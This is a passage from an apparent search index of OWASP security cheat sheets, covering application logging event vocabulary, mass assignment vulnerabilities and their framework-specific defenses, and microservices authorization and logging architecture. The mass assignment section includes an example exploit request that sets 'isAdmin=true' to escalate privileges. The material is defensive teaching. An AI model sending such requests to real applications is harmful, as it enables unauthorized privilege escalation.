{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_disabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has disabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_enableduseridmonitor","title":"sys_monitor_enabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are started again after being stopped, and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_enabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has enabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user-management-user","title":"User Management [USER]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_createduseridnewuseridattributesonetwothree","title":"user_created:[userid,newuserid,attributes[one,two,three]]","text":"

Description When creating new users, logging the specifics of the user creation event is helpful, especially if new users can be created with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_created:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created user1 with admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_updateduseridonuseridattributesonetwothree","title":"user_updated:[userid,onuserid,attributes[one,two,three]]","text":"

Description When updating users, logging the specifics of the user update event is helpful, especially if users can be updated with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_updated:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 updated user1 with attributes admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_archiveduseridonuserid","title":"user_archived:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When archiving users, logging the specifics of the user archive event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_archived:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 archived user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_deleteduseridonuserid","title":"user_deleted:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When deleting users, logging the specifics of the user delete event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_deleted:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has deleted user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#exclusions","title":"Exclusions","text":"

As important as what you DO log is what you DON'T log. Private or secret information, source code, keys, certs, etc. should never be logged.

For comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html","title":"Mass Assignment Cheat Sheet","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#introduction","title":"Introduction","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#definition","title":"Definition","text":"

Software frameworks sometime allow developers to automatically bind HTTP request parameters into program code variables or objects to make using that framework easier on developers. This can sometimes cause harm.

Attackers can sometimes use this methodology to create new parameters that the developer never intended which in turn creates or overwrites new variable or objects in program code that was not intended.

This is called a Mass Assignment vulnerability.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#alternative-names","title":"Alternative Names","text":"

Depending on the language/framework in question, this vulnerability can have several alternative names:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#example","title":"Example","text":"

Suppose there is a form for editing a user's account information:

<form>\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"userid\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"password\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"email\" text=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input type=\"submit\">\n</form>\u00a0\u00a0\n

Here is the object that the form is binding to:

public\u00a0class\u00a0User\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\nprivate\u00a0boolean\u00a0isAdmin;\n\n//Getters\u00a0&\u00a0Setters\n}\n

Here is the controller handling the request:

@RequestMapping(value\u00a0=\u00a0\"/addUser\",\u00a0method\u00a0=\u00a0RequestMethod.POST)\npublic\u00a0String\u00a0submit(User\u00a0user)\u00a0{\nuserService.add(user);\nreturn\u00a0\"successPage\";\n}\n

Here is the typical request:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com\n

And here is the exploit in which we set the value of the attribute isAdmin of the instance of the class User:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com&isAdmin=true\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#exploitability","title":"Exploitability","text":"

This functionality becomes exploitable when:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#github-case-study","title":"GitHub case study","text":"

In 2012, GitHub was hacked using mass assignment. A user was able to upload his public key to any organization and thus make any subsequent changes in their repositories. GitHub's Blog Post.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#solutions","title":"Solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#general-solutions","title":"General Solutions","text":"

An architectural approach is to create Data Transfer Objects and avoid binding input directly to domain objects. Only the fields that are meant to be editable by the user are included in the DTO.

public\u00a0class\u00a0UserRegistrationFormDTO\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\n\n//NOTE:\u00a0isAdmin\u00a0field\u00a0is\u00a0not\u00a0present\n\n//Getters\u00a0&\u00a0Setters\n}\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#language-framework-specific-solutions","title":"Language & Framework specific solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#spring-mvc","title":"Spring MVC","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing","title":"Allow-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setAllowedFields([\"userid\",\"password\",\"email\"]);\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing","title":"Block-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setDisallowedFields([\"isAdmin\"]);\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#nodejs-mongoose","title":"NodeJS + Mongoose","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_1","title":"Allow-listing","text":"
var\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0Boolean,\n});\n\nUserSchema.statics\u00a0=\u00a0{\nUser.userCreateSafeFields:\u00a0['userid',\u00a0'password',\u00a0'email']\n};\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n_\u00a0=\u00a0require('underscore');\nvar\u00a0user\u00a0=\u00a0new\u00a0User(_.pick(req.body,\u00a0User.userCreateSafeFields));\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_1","title":"Block-listing","text":"
var\u00a0massAssign\u00a0=\u00a0require('mongoose-mass-assign');\n\nvar\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0{\u00a0type:\u00a0Boolean,\u00a0protect:\u00a0true,\u00a0default:\u00a0false\u00a0}\n});\n\nUserSchema.plugin(massAssign);\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n/**\u00a0Static\u00a0method,\u00a0useful\u00a0for\u00a0creation\u00a0**/\nvar\u00a0user\u00a0=\u00a0User.massAssign(req.body);\n\n/**\u00a0Instance\u00a0method,\u00a0useful\u00a0for\u00a0updating**/\nvar\u00a0user\u00a0=\u00a0new\u00a0User;\nuser.massAssign(req.body);\n\n/**\u00a0Static\u00a0massUpdate\u00a0method\u00a0**/\nvar\u00a0input\u00a0=\u00a0{\u00a0userid:\u00a0'bhelx',\u00a0isAdmin:\u00a0'true'\u00a0};\nUser.update({\u00a0'_id':\u00a0someId\u00a0},\u00a0{\u00a0$set:\u00a0User.massUpdate(input)\u00a0},\u00a0console.log);\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#ruby-on-rails","title":"Ruby On Rails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#django","title":"Django","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#asp-net","title":"ASP NET","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#php-laravel-eloquent","title":"PHP Laravel + Eloquent","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_2","title":"Allow-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$fillable\u00a0=\u00a0array('userid','password','email');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_2","title":"Block-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$guarded\u00a0=\u00a0array('isAdmin');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#grails","title":"Grails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#play","title":"Play","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#jackson-json-object-mapper","title":"Jackson (JSON Object Mapper)","text":"

Take a look here and here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#gson-json-object-mapper","title":"GSON (JSON Object Mapper)","text":"

Take a look here and here for the document.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#json-lib-json-object-mapper","title":"JSON-Lib (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#flexjson-json-object-mapper","title":"Flexjson (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html","title":"Microservices Security Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is being increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures, high-scale applications and services. There are many security challenges need to be addressed in the application design and implementation phases. The fundamental security requirements that have to be addressed during design phase are authentication and authorization. Therefore, it is vital for applications security architects to understand and properly use existing architecture patterns to implement authentication and authorization in microservices-based systems. The goal of this cheat sheet is to identify such patterns and to do recommendations for applications security architect on possible way to use it.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#edge-level-authorization","title":"Edge-level authorization","text":"

In simple scenario, authorization can happen only at the edge level (API gateway). The API gateway can be leveraged to centralize enforcement of authorization for all downstream microservices, eliminating the need to provide authentication and access control for each of the individual services. In such case, NIST recommends to implement mitigating controls such as mutual authentication to prevent direct, anonymous connections to the internal services (API gateway bypass). It should be noted that authorization at the edge layer has a following limitations:

In most cases, development teams implement authorization in both places -- at the edge level at a coarse level of granularity and service level. To authenticate external entity edge can use access tokens (referenced token or self-contained token) transmitted via HTTP headers (e.g. \u201cCookie\u201d or \u201cAuthorization\u201d) or use mTLS.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization","title":"Service-level authorization","text":"

Service-level authorization gives each microservice more control to enforce access control policies. For further discussion, we use terms and definitions according with NIST SP 800-162. The functional components of access control system can be classified following way:

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization-existing-patterns","title":"Service-level authorization: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#decentralized-pattern","title":"Decentralized pattern","text":"

Development team implements PDP and PEP directly at microservice code level. All the access control rules and as well as attributes that need to implement that rule are defined and stored on the each microservice (step 1). When microservice receives (step 2) request along with some authorization metadata (e.g., end user context or requested resource ID), microservice analyzes it (step 3) in order to generate access control policy decision and then enforces authorization (step 4). Existing programming language frameworks allow development teams to implement authorization at the microservice layer. E.g., Spring Security allows developers to enable scopes checking (e.g. using scopes extracted from incoming JWT) in the resource server and use it to enforce authorization. Implementing authorization at the source code level means that the code must be updated whenever development team want to modify authorization logic.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-single-policy-decision-point","title":"Centralized pattern with single policy decision point","text":"

In that pattern access control rules are defined, stored, and evaluated centrally. Access control rules is defined using PAP (step 1) and delivered to centralized PDP as well as attributes that need to implement that rules (step 2). When a subject invokes microservice endpoint (step 3), microservice code invokes centralized PDP via network call and PDP generates access control policy decision by evaluating the query input against access control rules and attributes (step 4). Based on PDP decision microservice enforce authorization (step 5). To define access control rules development/operation team has to use some language or notation. An example is Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC) that is a standard to implement policy rules description. This pattern badly affects latency due additional network calls of the remote PDP endpoint, but it can be mitigated by caching authorization policy decisions at microservice level. It should be mentioned that PDP must be operated in high-availability mode due to resilience and availability issues. Application security architects should combine it with other patterns (e.g., authorization on API gateway level) in order to enforce \u201cdefense in depth\u201d principle.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-embedded-policy-decision-point","title":"Centralized pattern with embedded policy decision point","text":"

In that pattern access control rules are defined centrally but stored and evaluated at microservice level. Access control rules is defined using PAP (step 1) and delivered to embedded PDP as well as attributes that need to implement that rules (step 2). When a subject invokes microservice endpoint (step 3), microservice code invokes PDP and PDP generates access control policy decision by evaluating the query input against access control rules and attributes (step 4). Based on PDP decision microservice enforce authorization (step 5). PDP code in that case can be implemented as microservice built-in library or sidecar in service mesh architecture. Due to possible network/host failures and network latency it is advisable to implement embedded PDP as microservice library or sidecar on the same host with microservice. Embedded PDP usually store authorization policy and policy-related data in-memory to minimize external dependencies during authorization enforcement and get low latency. Main difference from \u201cCentralized pattern with single policy decision point\u201d with caching approach is that authorization decisions do not store on the microservice side, up to date authorization policy are stored on microservice side instead. It should be mentioned that caching authorization decisions may lead to applying outdated authorization rules and access control violations. Netfix presented (link, link) a real case of using \u201cCentralized pattern with embedded PDP\u201d pattern to implement authorization on the microservices level.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-authorization","title":"Recommendation on how to implement authorization","text":"
  1. To achieve scalability it is not advisable to hardcode authorization policy in source code (decentralized pattern), but use special language to express policy instead. The goal is to externalize/decouple authorization from code, and not just with a gateway/proxy that acts as a checkpoints. Recommended pattern for service-level authorization is \u201cCentralized pattern with embedded PDP\u201d due to its resilience and wide adoption.
  2. Authorization solution should be platform-level solution; dedicated team (e.g., Platform security team) must be accountable for development and operation of authorization solution as well as sharing microservice blueprint/library/components that implement authorization among development teams.
  3. Authorization solution should be based on widely used solution, because implementing custom solution has following cons:
  4. There is a probability that not all access control policy can be enforced by gateways/proxies and shared authorization library/components, so some specific access control rules still have to be implemented on microservice business code level. In order to do that it is advisiable to have and use by microservice development teams simple questionary/check-list to uncover such security requriments and handle its properly during microservice development.
  5. It is advisable to implement \u201cdefense in depth\u201d principle enforce authorization on:
  6. Access control policy formal procedures like development, approval, rolling-out must be implemented.
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#external-entity-identity-propagation","title":"External entity identity propagation","text":"

To make fine-granted authorization decision at the microservice level, microservice has to understand caller context (e.g. user ID, user roles/groups). In order to allow internal service layer to enforce authorization, edge layer has to propagate authenticated external entity identity (e.g., end user context) along with a request to downstream microservices. One of the simplest way to propagate external entity identity is to re-use the access token received by the edge and pass it to internal microservices. It should be mentioned that approach is highly insecure due to possible external access token leakage and may increase an attack surface because the communication relies on proprietary token-based system implementation: If an internal service is unintentionally exposed to the external network, then it can be directly accessed using the leaked access token. This attack is not possible if the internal service only accepts a token format known only to internal services. This pattern also is not external access token agnostic, i.e. internal services have to understand external access token and support a wide range of authentication techniques to extract identity from different types of external tokens (e.g. JWT, cookie, OpenID Connect token).

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#identity-propagation-existing-patterns","title":"Identity propagation: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#send-the-external-entity-identity-as-a-clear-or-self-signed-data-structures","title":"Send the external entity identity as a clear or self-signed data structures","text":"

In that approach calling microservice extracts external entity identity from incoming request (e.g. via parsing incoming access token), creates data structure (e.g. JSON or self-signed JWT) with context and passes that on to an internal microservices. In this scenario recipient microservice has to trust the calling microservice -- if the calling microservice want to violate access control rules, it can do so by setting any user/client ID or user roles it wants as the HTTP header. That approach is applicable in a highly trusted environment in which every microservice is developed by trusted development team according with secure software development practices.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#using-a-data-structures-signed-by-a-trusted-issuer","title":"Using a data structures signed by a trusted issuer","text":"

In this pattern after the external request is authenticated by authentication service at the edge layer, a data structure representing external entity identity (e.g., contained user ID, user roles/groups or permissions) is generated, signed or encrypted by the trusted issuer and propagated to internal microservices.

Netflix presented a real case of using that pattern: structure called \u201cPassport\u201d that contains user ID and its attributes and HMAC protected is created at the edge level for each incoming request, propagated to internal microservices and never exposes outside:

  1. Edge authentication service (EAS) obtains secret key from the Key Management System.
  2. EAS receives an access token (may be e.g. in a cookie, JWT, OAuth2 token) from incoming request.
  3. EAS decrypts the access token, resolves the external entity identity and sends it to the internal services in the signed \u201cPassport\u201d structure.
  4. Internal services can extract user identity in order to enforce authorization (e.g. to implement identity-based authorization) using wrappers.
  5. If necessary, internal service can propagate \u201cPassport\u201d structure to downstream services in the call chain.

It should be mentioned that pattern is external access token agnostic and allows to decouple external entity and its internal representation.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-identity-propagation","title":"Recommendation on how to implement identity propagation","text":"
  1. In order to implement external access token agnostic and extendable system decouple access tokens issued for external entity from its internal representation. Use single data structure to represent and propagate external entity identity among microservices. Edge-level service has to verify incoming external access token, issue internal entity representation structure and propagate it to downstream services.
  2. Using an internal entity representation structure signed (symmetric or asymmetric encryption) by a trusted issuer is recommended pattern adopted by community.
  3. Internal entity representation structure should be extensible to enable add more claims that may lead to low latency.
  4. Internal entity representation structure must not be exposed outside (e.g., to browser or external device).
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-to-service-authentication","title":"Service-to-service authentication","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#existing-patterns","title":"Existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#mutual-transport-layer-security","title":"Mutual transport layer security","text":"

In mTLS approach each microservice can legitimately identify who it talks to, in addition to achieving confidentiality and integrity of the transmitted data. Each microservice in the deployment has to carry a public/private key pair and uses that key pair to authenticate to the recipient microservices via mTLS. mTLS usually is implemented with a self-hosted Public Key Infrastructure. The main challenges using mTLS are: key provisioning and trust bootstrap, certificate revocation and key rotation.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#token-based","title":"Token based","text":"

Token based approach works at the application layer. Token is a container and may contain caller ID (microservice ID) and its permissions (scopes). Caller microservice can obtain signed token by invoking special security token service using its own service ID and password and then attaches it to every outgoing requests e.g., via HTTP headers. Called microservice can extract token and validate it online or offline.

  1. Online scenario:
  2. Offline scenario:
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Logging services in microservice-based systems aim to meet the principle of accountability and traceability and help detect security anomalies in operations via log analysis. Therefore, it is vital for application security architects to understand and adequately use existing architecture patterns to implement audit logging in microservices-based systems for security operations. A high-level architecture design is shown in the picture below and based on the following principles:

High-level recommendations to logging subsystem architecture with its rationales are listed below.

  1. Microservice shall not send log messages directly to the central logging subsystem using network communication. Microservice shall write its log message to a local log file:
  2. There shall be a dedicated component (logging agent) decoupled from the microservice. The logging agent shall collect log data on the microservice (read local log file) and send it to the central logging subsystem. Due to possible network latency issues, the logging agent shall be deployed on the same host (virtual or physical machine) with the microservice:
  3. A possible DoS attack on the central logging subsystem logging agent shall not use an asynchronous request/response pattern to send log messages. There shall be a message broker to implement the asynchronous connection between the logging agent and central logging service:
  4. Logging agent and message broker shall use mutual authentication (e.g., based on TLS) to encrypt all transmitted data (log messages) and authenticate themselves:
  5. Message broker shall enforce access control policy to mitigate unauthorized access and implement the principle of least privileges:
  6. Logging agent shall filter/sanitize output log messages to sensitive data (e.g., PII, passwords, API keys) will never send to the central logging subsystem (data minimization principle). For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.
  7. Microservices shall generate a correlation ID that uniquely identifies every call chain and helps group log messages to investigate them. The logging agent shall include a correlation ID in every log message.
  8. Logging agent shall periodically provide health and status data to indicate its availability or non-availability.
  9. Logging agent shall publish log messages in structured logs format (e.g., JSON, CSV).
  10. Logging agent shall append log messages with context data, e.g., platform context (hostname, container name), runtime context (class name, filename).

For comprehensive overview of events that should be logged and possible data format, please see the OWASP Logging Cheat Sheet and Application Logging Vocabulary Cheat Sheet

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html","title":"Microservices based Security Arch Doc Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is being increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures. There are many security challenges need to be addressed in the application design and implementation phases. In order to address some security challenges it is necessity to collect security-specific information on application architecture. The goal of this article is to provide a concrete proposal of approach to collect microservice-based architecture information to securing application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#context","title":"Context","text":"

During securing applications based on microservices architecture, security architects/engineers usually face with the following questions (mostly referenced in the OWASP Application Security Verification Standard Project under the section V1 \"Architecture, Design and Threat Modeling Requirements\"):

  1. Threat modeling and enforcement of the principle of least privilege:
  2. Data leakage analysis:
  3. Attack surface analysis:

In most cases, existing application architecture documentation is not suitable to answer those questions. Next sections propose what architecture security-specific information can be collected to answer the questions above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#objective","title":"Objective","text":"

The objectives of the cheat sheet are to explain what architecture security-specific information can be collected to answer the questions above and provide concrete proposal of approach to collect microservice-based architecture information to securing application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#proposition","title":"Proposition","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-the-building-blocks","title":"Collect information on the building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-application-functionality-services","title":"Identify and describe application-functionality services","text":"

Application-functionality services implement one or several business process or functionality (e.g., storing customer details, storing and displaying product catalog). Collect information on the parameters listed below related to each application-functionality service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of business process or functionality implemented by the microservice Link to source code repository Specify a link to service source code repository Development Team Specify development team which develops the microservice API definition If microservice exposes external interface specify a link to the interface description (e.g., OpenAPI specification). It is advisable to define used security scheme, e.g. define scopes or API keys needed to invoke dedicated endpoint (e.g., see). The microservice architecture description Specify a link to the microservice architecture diagram, description (if available) Link to runbook Specify a link to the microservice runbook"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-infrastructure-services","title":"Identify and describe infrastructure services","text":"

Infrastructure services including remote services may implement authentication, authorization, service registration and discovery, security monitoring, logging etc. Collect information on the parameters listed below related to each infrastructure service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of functionality implemented by the service (e.g., authentication, authorization, service registration and discovery, logging, security monitoring, API gateway). Link to source code repository Specify a link to service source code repository (if applicable) Link to the service documentation Specify a link to the service documentation that includes service API definition, operational guidance/runbook, etc."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-storages","title":"Identify and describe data storages","text":"

Collect information on the parameters listed below related to each data storage.

Parameter name Description Storage name (ID) Unique storage name or ID Software type Specify software that implements the data storage (e.g., PostgreSQL, Redis, Apache Cassandra)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-message-queues","title":"Identify and describe message queues","text":"

Messaging systems (e.g., RabbitMQ or Apache Kafka) are used to implement asynchronous microservices communication mechanism. Collect information on the parameters listed below related to each message queue.

Parameter name Description Message queue (ID) Unique message queue name or ID Software type Specify software that implements the message queue (e.g., RabbitMQ, Apache Kafka)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-assets","title":"Identify and describe data assets","text":"

Identify and describe data assets that processed by system microservices/services. It is advisable firstly to identify assets, which are valuable from a security perspective (e.g., \"User information\", \"Payment\"). Collect information on the parameters listed below related to each asset.

Parameter name Description Asset name (ID) Unique asset name or ID Protection level Specify asset protection level (e.g., PII, confidential) Additional info Add clarifying information"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-relations-between-building-blocks","title":"Collect information on relations between building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-storage-relations","title":"Identify \"service-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"service-to-storage\" relation.

Parameter name Description Service name (ID) Specify service name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Access type Specify access type, e.g. \"Read\" or \"Read/Write\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-synchronous-communications","title":"Identify \"service-to-service\" synchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" synchronous communication.

Parameter name Description Caller service name (ID) Specify caller service name (ID) defined above Called service name (ID) Specify called service name (ID) defined above Protocol/framework used Specify protocol/framework used for communication, e.g. HTTP (REST, SOAP), Apache Thrift, gRPC Short description Shortly describe the purpose of communication (requests for query of information or request/commands for a state-changing business function) and data passed between services (if possible, in therms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-asynchronous-communications","title":"Identify \"service-to-service\" asynchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" asynchronous communication.

Parameter name Description Publisher service name (ID) Specify publisher service name (ID) defined above Subscriber service name (ID) Specify subscriber service name (ID) defined above Message queue (ID) Specify message queue (ID) defined above Short description Shortly describe the purpose of communication (receiving of information or commands for a state-changing business function) and data passed between services (if possible, in therms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-asset-to-storage-relations","title":"Identify \"asset-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"asset-to-storage\" relation.

Parameter name Description Asset name (ID) Asset name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Storage type Specify storage type for the asset, e.g. \"golden source\" or \"cache\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#create-a-graphical-presentation-of-application-architecture","title":"Create a graphical presentation of application architecture","text":"

It is advisable to create graphical presentation of application architecture (building blocks and relations defined above) in form of services call graph or data flow diagram. In order to do that one can use special software tools (e.g. Enterprise Architect) or DOT language. See example of using DOT language here.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#use-collected-information-in-secure-software-development-practices","title":"Use collected information in secure software development practices","text":"

